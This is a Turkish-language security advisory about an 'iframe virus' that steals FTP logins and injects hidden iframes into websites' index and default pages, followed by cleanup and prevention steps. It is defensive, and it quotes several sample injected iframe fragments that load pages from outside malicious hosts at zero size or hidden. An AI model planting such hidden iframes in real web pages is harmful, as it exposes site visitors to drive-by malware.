Son zamanlarda ortaya çıkan ve bilginiz dahilinde olmadan FTP programınızı kullanarak adres listesindeki sitelere zararlı kod ekleyen bir çeşit virüs büyük hızla yayılmaya devam etmektedir.
Bu virüs bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin ftp’sini açarsanız açın girdiğiniz ftp bilgilerini kaydederek, sitelere girip index.php, index.html, index.htm, default.asp’in içlerine iframe kodu atiyor atılan iframe kodu şu şekildedir:
Örnek Bazı Virüs Kodları :
http://110.a38q.cn/lx.htm” width=”100″ height=”0″ frameborder=”0″>
veya
http://81.95.145.240/logo/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 />FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>
veya
http:/logo/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>
veya
http://*****.cn/in/” width=1 height=1 style=”visibility: hidden”>
bu kodların başlarında ve sonlarında iframe tagları bulunur
Nasıl Bulaşır
Virüs bulaşmış bir web sitesine girdiğiniz zaman ve bilgisayarınızda güncellenmiş ve bu virüsü tanıyan bir antivirüs programı yüklü değilse bu virüs sizede bulaşır.
Acil Önlem Paketi
1- Web sitenizi olduğu gibi bilgisayarınıza indirin.
2- Virüs bulaşmış sayfaları bulup içindeki virüs kodlarını silin. (Yukarıda virüs kodları verilmiştir.)
2- Web Sitenizin FTP Bilgilerini (Kullanıcı Adınızı veya Şifrenizi) değiştirin.
3- Bilgisayarınızı güncel bir antivirüs programları ile taratın. (Tavsiyemiz Kaspersky , nod 32 , antivir )
4- Eğer antivirüs programları bilgisayarınızda ilgili iframe virüsünü bulamamışsa bilgisayarınıza format atınız.
5- Bilgisayarınızın virüsten temizlendiğine emin olduysanız web sitenizi tekrar FTP ile sunucuya gönderebilirsiniz.
Iframe Virüsünden Korunma
1- PHP Siteler için: Web sitenizdeki tüm index.php ,index.htm, index.html dosyalarının chmod değerini 444 yapınız.
2- ASP siteler için: Web sitenizdeki tüm index.asp, default.asp, index.htm, index.html dosyalarını salt okunur yapın veya FTP User kullanıcısının yazma iznini kaldırın.
3- Ayrıca: FTP ile Dosya gönderme işleminiz bittiği zaman FTP şifrenizi hemen değiştirin.
4- Bilgisayarınıza güncel bir antivirüs programı bulundarmaya özen gösterin. Tavsiyemiz Kaspersky’dır.
5- Ad-Aware gibi trojan temizleme programları ile bilgisayarınız 2-3 günde bir taratın.